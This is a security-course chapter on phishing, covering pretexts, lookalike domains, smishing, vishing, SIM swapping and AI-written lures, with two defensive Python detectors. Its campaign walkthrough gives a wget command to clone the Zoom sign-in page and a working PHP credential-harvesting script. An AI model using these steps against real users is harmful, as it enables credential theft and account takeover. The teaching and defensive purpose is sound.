Phishing Basics

The Easiest Way In

Every other attack in this module exploits a system. Phishing exploits a person.

You can spend weeks finding a buffer overflow, reverse-engineering a binary, or chaining three vulnerabilities for remote code execution. Or you can send an email that says “your password expires today, click here to reset” and have working credentials in your inbox by morning.

Most modern breaches don’t start with a zero-day. They start with someone clicking a link.

This chapter is about understanding why phishing works, how attackers craft it, and what a real campaign looks like from start to finish.


Broad vs Spear

There are two ends of the phishing spectrum. They trade off the same way every attack does: scale versus precision.


Broad Phishing

A generic email blasted to thousands of inboxes. Low effort, low conversion rate, but the math still works at scale.

  • Mimics common services: Microsoft 365, Google Workspace, Dropbox, Netflix
  • No personalization beyond the recipient’s name, if that
  • One pretext, sent everywhere
  • Bets on volume: even a 0.1% click rate from 100,000 emails is 100 victims

This is consumer-grade phishing. Fake invoices, fake delivery notices, fake password reset prompts.


Spear Phishing

A precision email targeted at a specific person or small group. The attacker has done research, often weeks of it.

  • Personalized to the target’s role, projects, and relationships
  • Mentions real coworkers, real internal tools, real ongoing work
  • Crafted to arrive at a plausible moment (during budget season, after a merger, before a deadline)
  • Bets on believability: even one successful click can compromise an entire organization

The high end of spear phishing is whaling: targeting executives, board members, or finance directors specifically. The payoff justifies the effort.

Spear phishing is behind nearly every famous corporate breach. The 2014 Sony hack, the 2016 DNC compromise, and the 2020 Twitter incident all started with a single spear phishing email.


Side by Side

                      Broad               Spear
Effort per target     Minutes             Days to weeks
Conversion rate       ~0.1%               10 to 30%
Pretext               Generic             Hyper-specific
Defensive challenge   Volume detection    Spotting one good email

The Pretext

A pretext is the fake story behind a phishing message. The reason it makes sense.

A good pretext answers four questions in the victim’s head before they consciously ask them:

  1. Who is this from? (a name they recognize, or a role they’d expect)
  2. Why are they emailing me? (a plausible business reason)
  3. Why now? (timing that fits)
  4. What do they want me to do? (a small, reasonable-sounding action)

What Makes It Believable

Three elements, in roughly this order of importance:

  • Familiar source: an email from a coworker, vendor, or known service. If the From address looks off, nothing else matters.
  • Aligned tone: matches how the supposed sender actually writes (formal, casual, jargon-heavy, terse)
  • Plausible ask: something the recipient would expect to be asked, in roughly the way they’d expect to be asked

If any of these break, credibility leaks fast.


Lookalike Domains

When the attacker can’t use a real internal address, the next best thing is a domain that looks like the real one.


Common techniques:

Trick                 Real                Fake
Character swap        microsoft.com       m1cros0ft.com
Adjacent letter       google.com          googIe.com (capital I)
Homograph             apple.com           аpple.com (Cyrillic а)
Subdomain illusion    login.github.com    github.com.login-secure.io
TLD swap              company.com         company.co

Password managers are the best defense against lookalike domains. They won’t autofill credentials for m1cros0ft.com, even if the page is a pixel-perfect copy of microsoft.com. The domain has to match exactly.
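Because the domain has to match exactly, the same comparison can be run on the defender's side. What follows is an added example, not part of this chapter, of the lookalike checks a mail gateway or domain-monitoring job might apply to every host it sees; it goes slightly beyond the table above in that it also decodes punycode hosts and compares the registrable part of the domain rather than the whole hostname. The PROTECTED list, the CONFUSABLES table and the sample hosts are constructed for the example; a production version would use the Public Suffix List and the full Unicode confusables data instead of these small stand-ins.

```python
"""Lookalike-domain checks of the kind a mail gateway or domain-monitoring job
runs against a list of brands it protects.  Added example, not from the
chapter: PROTECTED, CONFUSABLES and the sample hosts are constructed."""
import unicodedata

PROTECTED = {"microsoft.com", "google.com", "apple.com", "github.com", "company.com"}

# Characters that render like a Latin letter: ASCII stand-ins and a few
# Cyrillic letters.  Constructed and deliberately small.
CONFUSABLES = {
    "0": "o", "1": "l", "I": "l", "|": "l", "5": "s", "3": "e",
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",
    "\u0441": "c", "\u0443": "y", "\u0445": "x",
}


def host_of(url_or_host):
    """Pull the host out of a URL without lowercasing it (case matters: 'I' vs 'l')."""
    s = url_or_host
    if "://" in s:
        s = s.split("://", 1)[1]
    s = s.split("/", 1)[0].split("@")[-1].split(":")[0]
    # Browsers send Unicode hosts as punycode (xn--...); decode so the checks
    # see the characters the user sees.
    try:
        return s.encode("ascii").decode("idna")
    except UnicodeError:
        return s


def registered_domain(host):
    """Last two labels.  Crude stand-in for a Public Suffix List lookup."""
    return ".".join(host.rstrip(".").split(".")[-2:])


def skeleton(host):
    """Canonical form: confusables and accents folded, then lowercased, so
    'googIe.com' and 'm1cros0ft.com' compare against their Latin targets."""
    out = []
    for ch in host:
        ch = CONFUSABLES.get(ch, ch)
        ch = unicodedata.normalize("NFKD", ch)[0]
        out.append(ch.lower())
    return "".join(out)


def mixed_scripts(host):
    """True if letters from more than one script are present (e.g. a Cyrillic
    'а' inside an otherwise Latin name)."""
    scripts = {unicodedata.name(ch, "?").split(" ")[0] for ch in host if ch.isalpha()}
    return len(scripts) > 1


def edit_distance(a, b):
    """Levenshtein distance, used for one-character swaps and TLD changes."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(url_or_host):
    """Return one of: legitimate, homograph, confusable, subdomain-illusion,
    lookalike, unrelated."""
    host = host_of(url_or_host)
    reg = registered_domain(host)
    if reg.lower() in PROTECTED:
        return "legitimate"            # exact match on the registrable part
    if mixed_scripts(host):
        return "homograph"             # Cyrillic/Latin mix, e.g. аpple.com
    sk = skeleton(reg)
    if sk in PROTECTED:
        return "confusable"            # googIe.com folds to google.com
    padded = "." + host.lower() + "."
    if any("." + p + "." in padded for p in PROTECTED):
        return "subdomain-illusion"    # github.com.login-secure.io
    if min(edit_distance(sk, p) for p in PROTECTED) <= 1:
        return "lookalike"             # m1cros0ft.com, company.co
    return "unrelated"


if __name__ == "__main__":
    for sample in ("login.github.com", "m1cros0ft.com", "googIe.com",
                   "\u0430pple.com", "github.com.login-secure.io",
                   "https://company.co/reset", "example.org"):
        print(f"{sample:32} {classify(sample)}")
```

The order of the checks matters: the registrable domain is tested for an exact match first, so a legitimate subdomain such as login.github.com is never flagged, and the subdomain-illusion check runs on the full hostname so that a protected brand used as a decoy label is caught even when the registrable domain is unrelated.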


Delivery Channels

Phishing is medium-agnostic. Wherever people communicate, attackers follow.


Email

Still the dominant channel. Cheap to send, easy to spoof, and people read it on autopilot. Most defensive infrastructure is built around email, which means attackers have built the most sophisticated evasion infrastructure around email too.


Smishing (SMS)

Phishing via text message. Effective for several reasons:

  • Higher open rates than email (over 90%, often within minutes)
  • Smaller screens make URL inspection harder
  • Personal medium lowers the recipient’s guard
  • URL shorteners are normal in SMS, so suspicious short links don’t stand out

Common pretexts: failed package delivery, bank verification, unexpected MFA prompts the user didn’t trigger.


Vishing (Voice)

A phone call from the attacker, usually impersonating IT support, a bank, or a vendor. Almost pure social engineering, very little technical component.

The classic “CEO gift card scam” is a vishing variant: someone calls or messages an assistant claiming to be an executive, asks them to urgently purchase gift cards for a client meeting, then asks for the codes.

Vishing has become dramatically more effective with voice cloning. We’ll come back to this.


Chat-Based Phishing

Increasingly common, because organizations have shifted to Slack, Microsoft Teams, and Discord for internal communication. These platforms have:

  • Weaker spam filtering than email
  • Implicit trust between users in the same workspace
  • Less user awareness of phishing risk

A phish that lands in a Slack DM from a “new hire” account is often trusted without a second thought.


SIM Swapping

Not phishing by itself, but a key enabler. The attacker convinces a mobile carrier to port the victim’s phone number onto a SIM card the attacker controls.

Once the number is theirs, they receive:

  • The victim’s SMS-based MFA codes
  • Password reset links sent via SMS
  • Phone calls intended for the victim

SMS is the weakest form of MFA. SIM swapping is the main reason. If a target uses SMS-based two-factor authentication, their phone number is a single point of failure.


Social Engineering Levers

A pretext gets the email read. A lever gets the click.

Levers are psychological pressures that push the target into acting before they think carefully.


Trust

The foundation. Every other lever sits on top of it. Trust comes from:

  • A recognized sender (real or convincingly spoofed)
  • A familiar context (something the recipient expected, or could plausibly expect)
  • Surface signals of legitimacy (correct logos, HTTPS, polished language)

Trust is binary in practice. Either the recipient trusts the message and proceeds, or they don’t and the attack ends. Everything else is just trying to push them into the “trust” bucket.


Urgency

Time pressure that prevents careful evaluation:

  • “Your password expires in 1 hour.”
  • “Verify your account within 24 hours or it will be suspended.”
  • “This shared document expires when you close it.”

Urgency works best in environments where employees are already under time pressure. Stressed people skip steps. Calm people read more carefully.


Fear

A threat that triggers a defensive reaction:

  • “Suspicious login detected from a new location.”
  • “Your account has been compromised.”
  • “Legal action will be taken if you don’t respond.”

Fear narrows attention. The victim focuses on resolving the threat and stops evaluating whether the threat is real.


Authority

Pressure from a perceived superior. Hardest to resist in hierarchical organizations:

  • A CEO asking for a wire transfer
  • A CFO requesting payroll data
  • IT demanding immediate credential verification

Authority and urgency combine viciously. “Drop everything, the CFO needs this in 10 minutes” is one of the most effective pretexts in business email compromise.


Baiting

Offering something positive in exchange for action:

  • A reward (gift card, bonus, recognition)
  • A favor (early access, exclusive invitation)
  • An opportunity (job offer, partnership)

Baiting works against the same instincts as scams: the part of the brain that wants the upside often overrides the part checking for downside.


AI-Enhanced Phishing

Phishing used to have obvious tells: bad grammar, awkward phrasing, generic salutations. Those tells are gone.

Modern attackers use Large Language Models to write phishing emails that are indistinguishable from legitimate corporate communication.


LLMs for Pretext Research

Instead of manually digging through LinkedIn, the attacker feeds inputs to an LLM and gets a complete dossier:

  • The target’s role and reporting structure
  • Internal projects mentioned in public talks or blog posts
  • Vendors and tools the company uses
  • Writing style of executives, scraped from public posts

This is called Retrieval-Augmented Generation (RAG): the LLM is given access to public information about the target and uses it to ground its output in real facts.

The result is a phishing email that mentions the actual project, the correct internal tool name, and a plausible coworker. Generated in seconds.


Voice Cloning

A few minutes of recorded speech is enough to clone someone’s voice. The training data can come from:

  • Conference talks on YouTube
  • Podcast appearances
  • Earnings calls
  • Voicemail greetings

Once cloned, the attacker generates arbitrary speech in that voice. Vishing calls become dramatically more convincing when the boss’s voice is on the line asking for the wire transfer.


Deepfake Video

In 2024, the engineering firm Arup lost $25 million to a deepfake video call. The attacker:

  1. Set up a video conference with a finance employee in Hong Kong
  2. Joined the call with deepfake clones of the CFO and several other executives
  3. Had the “CFO” verbally authorize 15 wire transfers totaling HK$200 million

The victim never spoke to a real person. Every other participant on the call was synthetic.

The tools to do this are freely available now. Voice cloning takes minutes. Video deepfakes take hours. Both will keep getting easier and cheaper.


A Realistic Campaign

To make this concrete, here’s how a credential harvesting campaign actually unfolds end to end.

The starting point: the attacker has a low-privilege foothold in the target organization, usually a set of credentials from a public breach matched against a corporate email address. In this example, the compromised account belongs to [email protected].


Step 1: Internal Reconnaissance

The attacker logs into the helpdesk webmail and reads outgoing messages. They find a recent email sent to the sales department:

“Please log in to Zoom within two weeks to keep your license active.”

Two important findings from this single email:

  1. A plausible reason to send another reminder
  2. A distinctive writing style to imitate

Step 2: Generate the Phishing Email

The attacker feeds the original email to an LLM with a prompt like:

“Write a follow-up to this email in the same style, reminding employees to log in to Zoom. Include a click-here link.”

The LLM returns a polished email that matches the helpdesk’s tone, vocabulary, and formatting. In seconds.


Step 3: Clone the Sign-In Page

Using wget with flags to mirror the page and rewrite asset links:

wget -E -k -K -p -e robots=off -H -Dzoom.us -nd "https://zoom.us/signin"

What each flag does:

  • -E adjusts file extensions to match content types
  • -k rewrites links to work locally
  • -K keeps original files alongside the rewritten ones
  • -p downloads all assets needed to render the page
  • -e robots=off ignores robots.txt restrictions
  • -H allows following links to other hosts, and -Dzoom.us limits that to zoom.us and its subdomains
  • -nd flattens everything into one directory

The result is a local copy of the sign-in page that looks identical to the real one.


Step 4: Wire the Form to Capture Credentials

The attacker modifies the form’s action attribute to point at a script they control:

<form action="custom_login.php" method="POST">

The script does three things:

  1. Writes the submitted email and password to a file
  2. Redirects the victim to the real sign-in page
  3. Logs nothing visible to the victim

<?php
$data = "Email: " . $_POST['email'] . "\n"
      . "Password: " . $_POST['password'] . "\n";
file_put_contents('credentials.txt', $data, FILE_APPEND);
header('Location: https://zoom.us/signin');
?>

After submitting, the victim ends up on the real sign-in page, sees a normal login screen, assumes they mistyped their password, and logs in again. They never realize anything happened.


Step 5: Send the Email

From the compromised helpdesk@ account, the attacker hits Reply All on the original Zoom license thread and pastes in the LLM-generated text. The malicious link is added as a hyperlink labeled “here” or “log in”.

Because the email comes from the actual helpdesk address, on the actual mail server, with the actual prior conversation in the thread:

  • DMARC passes
  • SPF passes
  • DKIM passes
  • The email lands in the inbox, not spam
  • The recipient sees a familiar sender continuing a familiar conversation

Step 6: Harvest

Within hours, the credentials file fills up:

Email: [email protected]
Password: W00tw00t!!

Email: [email protected]
Password: Summer2024!

Email: [email protected]
Password: Letmein123!

Every credential is a foothold. The attacker now has working logins for multiple sales accounts and can pivot to anywhere those credentials are reused: VPN, internal Slack, CRM, expense systems.


Why This Works

Looking back at the chain, almost no part of the attack was technical. The technical pieces were:

  • One wget command
  • A 10-line PHP script
  • One modified HTML attribute

Everything else was social: research, pretext, tone matching, trust exploitation, and conversation hijacking.

Phishing is asymmetric. The attacker needs one person to click. The defender needs every person to refuse, every time.


What Defenders Do

Understanding defenses helps you see what’s missing in a target environment.

Defense               What it does                                        What it misses
Email filtering       Blocks known-bad senders, suspicious attachments    Custom pretexts, lookalike domains, AI-written text
SPF / DKIM / DMARC    Verifies email origin                               Phishing from a compromised legitimate account
MFA                   Requires a second factor                            Prompt bombing, SIM swap, real-time relay
User training         Teaches people to spot phishing                     Highly targeted spear phishing
Password managers     Refuse to autofill on wrong domains                 Users who type credentials manually
Domain monitoring     Watches for lookalike registrations                 Subdomain abuse on legitimate services

Every defense closes one door. None of them close every door.
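The SPF / DKIM / DMARC row, and the Step 5 list earlier in the chapter, make the same point: authentication proves which account sent the message, not where its links go. The following is an added example, not part of this chapter, of the triage a gateway can run after authentication has already passed: it reads the Authentication-Results header, extracts every link from the HTML body, and holds the message if a link points outside the set of domains the organisation expects. The two raw messages, the example.com domain, the login-secure.io host and the allow-list are constructed for the example.

```python
"""Triage of an email that passes SPF, DKIM and DMARC but was sent from a
compromised internal account.  Added example, not from the chapter: the raw
messages, example.com and the allow-list are constructed."""
import email
import re
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Domains links are expected to point at: the organisation itself and the
# services it actually uses.  Constructed allow-list.
EXPECTED_LINK_DOMAINS = {"example.com", "zoom.us"}

# Constructed: the hijacked reply from the chapter's scenario.  The link is
# labelled "here"; the href points at a lookalike host under login-secure.io.
PHISH = """\
From: Helpdesk <helpdesk@example.com>
To: sales@example.com
Subject: Re: Zoom license reminder
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=example.com;
 dkim=pass header.d=example.com; dmarc=pass header.from=example.com
Content-Type: text/html; charset=utf-8

<p>Quick reminder: please log in <a href="https://zoom.us.login-secure.io/signin">here</a>
within two weeks to keep your license active.</p>
"""

# Constructed: the genuine reminder, for comparison.
LEGIT = """\
From: Helpdesk <helpdesk@example.com>
To: sales@example.com
Subject: Zoom license reminder
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=example.com;
 dkim=pass header.d=example.com; dmarc=pass header.from=example.com
Content-Type: text/html; charset=utf-8

<p>Please log in at <a href="https://zoom.us/signin">https://zoom.us/signin</a>
within two weeks to keep your license active.</p>
"""


class LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> in an HTML body."""
    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registered_domain(host):
    """Last two labels; a real deployment would use the Public Suffix List."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def auth_results(msg):
    """Map spf/dkim/dmarc to their result from the Authentication-Results header."""
    header = msg.get("Authentication-Results", "")
    return dict(re.findall(r"\b(spf|dkim|dmarc)=(\w+)", str(header)))


def triage(raw):
    msg = email.message_from_string(raw, policy=policy.default)
    auth = auth_results(msg)
    authenticated = all(auth.get(m) == "pass" for m in ("spf", "dkim", "dmarc"))

    body = msg.get_body(preferencelist=("html",)).get_content()
    collector = LinkCollector()
    collector.feed(body)

    findings = []
    for href, text in collector.links:
        host = urlsplit(href).hostname or ""
        if registered_domain(host) not in EXPECTED_LINK_DOMAINS:
            findings.append(f"link to unexpected domain {host} labelled {text!r}")
        # A label that looks like a URL but points somewhere else is its own tell.
        if text.startswith("http") and (urlsplit(text).hostname or "") != host:
            findings.append(f"label {text!r} does not match target {host}")

    # Authentication says which account sent it; the links say where it goes.
    return {
        "authenticated": authenticated,
        "findings": findings,
        "verdict": "hold for review" if findings else "deliver",
    }


if __name__ == "__main__":
    for name, raw in (("phish", PHISH), ("legit", LEGIT)):
        print(name, triage(raw))
```

Both messages authenticate cleanly, because both really were sent from the helpdesk account; only the link destination separates them, which is why the verdict is computed from the findings and not from the authentication result.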